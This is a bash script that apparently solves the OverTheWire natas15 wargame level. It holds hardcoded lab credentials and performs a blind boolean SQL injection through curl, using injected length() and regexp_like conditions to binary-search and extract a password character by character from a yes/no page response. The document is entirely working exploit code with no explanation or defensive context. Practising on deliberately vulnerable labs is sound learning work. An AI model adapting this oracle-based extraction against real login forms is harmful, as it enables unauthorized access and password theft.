#!/usr/bin/env bash req() { curl http://natas15.natas.labs.overthewire.org/index.php \ -X POST \ -u natas15:SdqIqBsFcz3yotlNYErZSZwblkm0lrvx \ -d "username=natas16\" and $1 -- " \ -sS \ | grep exists &>/dev/null } # ie `guess_length "=32"` or `guess_length ">32"` guess_length() { req "length(password)$1" } get_length() { echo "[*] Guessing length" local MIN=${1:-1} local MAX=${2:-100} # local PADMAX=${#MAX} local FGUESS="%${#MAX}s - %-${#MAX}s" while true; do printf "[-] Guess: $FGUESS\r" $MIN $MAX if [ $((MAX-MIN)) -eq 1 ]; then break fi; local MID=$(( (MAX+MIN)/2 )) guess_length ">$MID" && MIN=$MID || MAX=$MID done printf "[+] Found: $FGUESS\n" $MIN $MAX return $MAX } LOWER="abcdefghijklmnopqrstuvwxyz" UPPER="ABCDEFGHIJKLMNOPQRSTUVWXYZ" DIGIT="0123456789" guess_regex() { req "regexp_like(password, '^$1[a-zA-Z0-9]*\$', 'c')" } exploit_oracle() { echo "[@] Forcing oracle exploit" local PREFIX="" local LENGTH=$1 while true; do if [ "${#PREFIX}" = "$LENGTH" ]; then break fi for chars in $LOWER $UPPER $DIGIT; do local MIN=1 local MAX=${#chars} local RANGE="[${chars:MIN-1:1}-${chars:MAX-1:1}]" echo -en "[*] ?? $RANGE\r" guess_regex "$PREFIX$RANGE$POSTFIX" || continue echo "[+] Found[CHARSET]: $chars" local MID=$(( (MAX+MIN)/2 )) while true; do echo -en "[*] Guess: $RANGE\r" if [ $((MAX-MIN)) -eq 1 ]; then if guess_regex "$PREFIX${chars:MIN-1:1}"; then PREFIX="${PREFIX}${chars:MIN-1:1}" else PREFIX="${PREFIX}${chars:MAX-1:1}" fi echo -e "[+] Update: ${chars:MAX-1:1} -> $PREFIX" break fi; MID=$(( (MAX+MIN)/2 )) RANGE="[${chars:MIN-1:1}-${chars:MID-1:1}]" guess_regex "$PREFIX$RANGE" && MAX=$MID || MIN=$MID done break done done printf "[+] Found: $FGUESS\n" $MIN $MAX } get_length LENGTH=$? exploit_oracle "$LENGTH"